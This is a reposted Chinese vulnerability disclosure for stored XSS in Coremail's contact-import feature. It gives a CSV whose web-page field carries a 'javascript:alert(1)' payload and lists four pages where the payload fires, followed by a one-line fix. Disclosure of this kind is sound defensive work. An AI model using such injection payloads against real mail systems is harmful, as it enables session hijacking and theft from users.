Coremail某功能多处存储型XSS漏洞

怪狗 2016-8-1 Exploit 0 0

coremail在个人通讯录处可以导入联系人,格式为csv。
Coremail某功能多处存储型XSS漏洞
导入如下CSV:

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aaaaaaa,,@qq.com,,,,13132132132,,,,,,19881212,,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=
,,,,,,,,,,,,,,,FAMILY=
,,,,,,,,,,,,,,,COWORKERS=
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人

可见主页面已经转义了,没有触发:
Coremail某功能多处存储型XSS漏洞
但各个功能页面都存在触发的问题,列举如下:1.新建联系组时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
2.打印联系人时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
3.编辑组时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
4.清空联系人邮件时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞

解决方案:

dom操作该过滤的过滤

原文地址:http://www.77169.com/exploits/2015/20150414023200.shtm

转载请注明来自华盟网,本文标题:《Coremail某功能多处存储型XSS漏洞》

喜欢 (0) 发布评论
发表评论